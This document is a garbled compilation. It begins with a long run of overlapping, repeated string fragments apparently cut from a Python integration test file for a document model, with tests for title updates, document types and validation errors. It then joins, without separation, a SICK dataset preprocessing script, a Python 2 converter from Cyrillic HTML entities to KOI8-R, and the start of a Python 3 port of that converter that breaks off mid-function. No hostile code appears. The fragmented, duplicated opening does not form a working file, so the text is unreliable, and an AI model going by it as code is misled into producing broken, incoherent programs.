self.assertTrue(", "Copyright (C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration", "generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name", "from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import factories class", "is not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc", "all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'],", "self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\",", "self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\"", "def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\",", "self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent", "\"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document()", "self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = {", "Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import", "create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\":", "docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if", "{ \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular", "document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response =", "all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value", "= Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title =", "Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\"", "def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\":", "obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp)", "TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, 
self).setUp() self.api =", "self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title", "integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self):", ").all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self):", "resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create", "super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document", ") self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp,", "return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create", "data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return", "\"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type doc_type =", "self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data", "all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict)", "doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\",", "\"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict =", "value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`, ' '`REFERENCE_URL`\"', resp.data)", "= \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title})", "# Copyright (C) 2017 Google Inc. 
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>", "update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response", "validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())],", "test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\",", "for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import", "http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from", "obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp =", "import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument,", "Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from", "LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import", "import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import", "Api from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test", "[self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data)", "sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is", "\"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from", "integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase):", "= { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name =", "test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document =", "def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test", "tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper", "import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint:", "self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title", "def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data =", "} obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = 
self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp", "from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from", "self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`, '", "all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() )", "\"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\":", "self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`, ' '`REFERENCE_URL`\"',", "= self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type,", "integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" #", "\"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type", "<reponame>Killswitchz/ggrc-core<filename>test/integration/ggrc/models/test_document.py<gh_stars>0 # Copyright (C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE", "from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\"", "= doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data", "file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase", "update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data", "create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation", "document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], }", "update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\":", "obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for", "None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object(", "self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc)", "import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import", "all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator", "type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not", "create url.\"\"\" 
self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create", "\"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title)", "data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name", "\"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict", "disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self):", "\"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def", "resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options", "response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn", "doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type ==", "= self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute", "= self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with", "from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def", "Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api", "pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def", "obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. '", "setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update", "} if doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type or", "not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc =", "= self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. 
' 'Expected options are", "= factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type):", "(C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests", "under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models", "\"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type doc_type", "create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\":", "obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected", "== resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test", "\"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name)", "test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen", "def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document", "generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\"", "\"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\":", "cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen =", "document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self,", "url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\"", "doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None)", "factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp()", "= \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title)" ]
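One detail in create_document_by_type worth flagging: `doc_type = doc_type or all_models.Document.URL` uses the `x or default` idiom, which substitutes the default for any falsy value, not just None:

for doc_type in (None, "", "EVIDENCE"):
    print(repr(doc_type or "URL"))  # 'URL', 'URL', 'EVIDENCE'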
import argparse
import os

from scipy.special import erf
from scipy.stats import truncnorm
import numpy as np

import data


def build_vector_cache(glove_filename, vec_cache_filename, vocab):
    """Write only the GloVe vectors whose tokens appear in vocab to a cache file."""
    print("Building vector cache...")
    with open(glove_filename) as f, open(vec_cache_filename, "w") as f2:
        for line in f:
            tok, vec = line.split(" ", 1)
            if tok in vocab:
                vocab.remove(tok)
                f2.write("{} {}".format(tok, vec))


def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100):
    """Discretized truncated normal over the integers a..b whose mean is moved
    toward tgt_loc; an alternative to discrete_lerp that this script never calls."""
    def phi(zeta):
        return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2)

    def Phi(x):
        return 0.5 * (1 + erf(x / np.sqrt(2)))

    def tgt_loc_update(x):
        y1 = phi((a - x) / sigma)
        y2 = phi((b - x) / sigma)
        x1 = Phi((b - x) / sigma)
        x2 = Phi((a - x) / sigma)
        denom = x1 - x2 + 1E-4
        return y1 / denom - y2 / denom

    x = tgt_loc
    direction = np.sign(tgt_loc - (b - a))
    # Fixed-point iteration for the location parameter that places the
    # truncated distribution's mean near tgt_loc.
    for _ in range(n_steps):
        x = tgt_loc - sigma * tgt_loc_update(x)
    tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma)
    rrange = np.arange(a, b + 1)
    pmf = tn.pdf(rrange)
    pmf /= np.sum(pmf)
    return pmf


def discrete_lerp(a, b, ground_truth):
    """Split a real-valued score in [a, b] between its two neighboring integer
    labels so that the mean of the resulting distribution equals the score."""
    pmf = np.zeros(b - a + 1)
    c = int(np.ceil(ground_truth + 1E-8))
    f = int(np.floor(ground_truth))
    pmf[min(c - a, b - a)] = ground_truth - f
    pmf[f - a] = c - ground_truth
    return pmf


def smoothed_labels(truth, n_labels):
    return discrete_lerp(1, n_labels, truth)


def preprocess(filename, output_name="sim_sparse.txt"):
    """Convert a file of similarity scores into sparse label distributions."""
    print("Preprocessing {}...".format(filename))
    with open(filename) as f:
        values = [float(l.strip()) for l in f.readlines()]
    values = [" ".join([str(l) for l in smoothed_labels(v, 5)]) for v in values]
    with open(os.path.join(os.path.dirname(filename), output_name), "w") as f:
        f.write("\n".join(values))


def add_vocab(tok_filename, vocab):
    with open(tok_filename) as f:
        for line in f:
            vocab.update(line.strip().split())


def main():
    base_conf = data.Configs.base_config()
    sick_conf = data.Configs.sick_config()
    sick_folder = sick_conf.sick_data
    vocab = set()
    for name in ("train", "dev", "test"):
        preprocess(os.path.join(sick_folder, name, "sim.txt"))
        add_vocab(os.path.join(sick_folder, name, "a.toks"), vocab)
        add_vocab(os.path.join(sick_folder, name, "b.toks"), vocab)
    build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab)


if __name__ == "__main__":
    main()
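A quick worked example (not part of the original script) makes the sparse-label encoding concrete: a gold similarity score on the 1..5 SICK scale is split between its two neighboring integer labels so that the expectation of the resulting distribution reproduces the score.

# Sanity check of smoothed_labels/discrete_lerp above; illustrative only,
# and assumes the functions defined in the script are in scope.
import numpy as np

pmf = smoothed_labels(3.6, 5)            # same as discrete_lerp(1, 5, 3.6)
print(pmf)                               # ~[0.  0.  0.4  0.6  0. ]
print(np.dot(pmf, np.arange(1, 6)))      # ~3.6: mass on labels 3 and 4 only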
"""Convert Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded

This script is used during the build process of the Russian translation of
"Dive Into Python" (http://diveintopython.org/).  It takes one argument, which
can be either an HTML file or a directory.  If a file, it converts the file in
place; if a directory, it converts every HTML file in the immediate directory
(but not recursively).  Safe but pointless to run more than once on the same
file or directory.
"""

__author__ = "<NAME> (<EMAIL>)"
__version__ = "$Revision: 1.2 $"
__date__ = "$Date: 2004/05/05 21:57:19 $"
__copyright__ = "Copyright (c) 2001 <NAME>"
__license__ = "Python"

import os
import sys
import re

unicodeToKOI8R = { \
    '&#1025;': '\xb3', '&#1040;': '\xe1', '&#1041;': '\xe2', '&#1042;': '\xf7',
    '&#1043;': '\xe7', '&#1044;': '\xe4', '&#1045;': '\xe5', '&#1046;': '\xf6',
    '&#1047;': '\xfa', '&#1048;': '\xe9', '&#1049;': '\xea', '&#1050;': '\xeb',
    '&#1051;': '\xec', '&#1052;': '\xed', '&#1053;': '\xee', '&#1054;': '\xef',
    '&#1055;': '\xf0', '&#1056;': '\xf2', '&#1057;': '\xf3', '&#1058;': '\xf4',
    '&#1059;': '\xf5', '&#1060;': '\xe6', '&#1061;': '\xe8', '&#1062;': '\xe3',
    '&#1063;': '\xfe', '&#1064;': '\xfb', '&#1065;': '\xfd', '&#1066;': '\xff',
    '&#1067;': '\xf9', '&#1068;': '\xf8', '&#1069;': '\xfc', '&#1070;': '\xe0',
    '&#1071;': '\xf1', '&#1072;': '\xc1', '&#1073;': '\xc2', '&#1074;': '\xd7',
    '&#1075;': '\xc7', '&#1076;': '\xc4', '&#1077;': '\xc5', '&#1078;': '\xd6',
    '&#1079;': '\xda', '&#1080;': '\xc9', '&#1081;': '\xca', '&#1082;': '\xcb',
    '&#1083;': '\xcc', '&#1084;': '\xcd', '&#1085;': '\xce', '&#1086;': '\xcf',
    '&#1087;': '\xd0', '&#1088;': '\xd2', '&#1089;': '\xd3', '&#1090;': '\xd4',
    '&#1091;': '\xd5', '&#1092;': '\xc6', '&#1093;': '\xc8', '&#1094;': '\xc3',
    '&#1095;': '\xde', '&#1096;': '\xdb', '&#1097;': '\xdd', '&#1098;': '\xdf',
    '&#1099;': '\xd9', '&#1100;': '\xd8', '&#1101;': '\xdc', '&#1102;': '\xc0',
    '&#1103;': '\xd1', '&#1105;': '\xa3' }

unicodePattern = re.compile(r'&#[0-9]{4,4};')
charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE)

def translateMatch(match):
    unicode = match.group(0)
    if unicodeToKOI8R.has_key(unicode):
        return unicodeToKOI8R[unicode]
    else:
        return unicode

def translateBuffer(buffer):
    buffer = unicodePattern.sub(translateMatch, buffer)
    buffer = charsetPattern.sub('KOI8-R', buffer)
    return buffer

def translateFile(filename, outfilename=None):
    if not outfilename:
        outfilename = filename
    fsock = open(filename)
    buffer = fsock.read()
    fsock.close()
    buffer = translateBuffer(buffer)
    fsock = open(outfilename, 'wb')
    fsock.write(buffer)
    fsock.close()

def htmlFilter(filename):
    return os.path.splitext(filename)[1] == '.html'

def translateDirectory(directoryname, filterFunc=htmlFilter):
    fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)]
    fileList = filter(filterFunc, fileList)
    map(translateFile, fileList)

if __name__ == "__main__":
    name = sys.argv[1]
    if os.path.isdir(name):
        translateDirectory(name)
    else:
        translateFile(name)
If a file, it converts the file in place; if", "= unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if", "Safe but pointless to run more than once on the same file or", "'&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern =", "= \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19", "'&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;':", "(<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__", "'\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb',", "{ \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;':", "'&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;':", "= { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7',", "fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename):", "but pointless to run more than once on the same file or directory.", "= \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ =", "run more than once on the same file or directory. \"\"\" __author__ =", "import sys import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;':", "a directory. If a file, it converts the file in place; if a", "unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer", "'&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;':", "pointless to run more than once on the same file or directory. \"\"\"", "buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1]", "= \"Python\" import os import sys import re unicodeToKOI8R = { \\ '&#1025;':", "__version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ =", "'&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;':", "'\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde',", "HTML file in the immediate directory (but not recursively). Safe but pointless to", "'&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;':", "'\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5',", "buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close()", "\"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import os import sys import re", "the Russian translation of \"Dive Into Python\" (http://diveintopython.org/). 
It takes one argument, which", "in place; if a directory, it converts every HTML file in the immediate", "'&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;':", "fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList =", "'\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1',", "'\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};')", "Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded This script is used during the build", "This script is used during the build process of the Russian translation of", "import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;':", "takes one argument, which can be either an HTML file or a directory.", "an HTML file or a directory. If a file, it converts the file", "1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001", "if not outfilename: outfilename = filename fsock = open(filename) buffer = fsock.read() fsock.close()", "'&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;':", "'\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd',", "'&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;':", "'\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb',", "= [os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList)", "unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;':" ]
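The script above is Python 2 throughout (`dict.has_key`, text-mode reads, `map` used for its side effects), so it will not run under Python 3 as written. A minimal Python 3 sketch of the same substitution idea follows; this is an assumed port, not part of the original build scripts, and only two mapping entries are shown for brevity:

# Assumed Python 3 port of the entity-to-KOI8-R substitution (illustrative).
import re

UNICODE_TO_KOI8R = {b'&#1040;': b'\xe1',   # capital A
                    b'&#1072;': b'\xc1'}   # small a

ENTITY_PATTERN = re.compile(rb'&#[0-9]{4};')
CHARSET_PATTERN = re.compile(rb'ISO-8859-1', re.IGNORECASE)

def translate_buffer(data):
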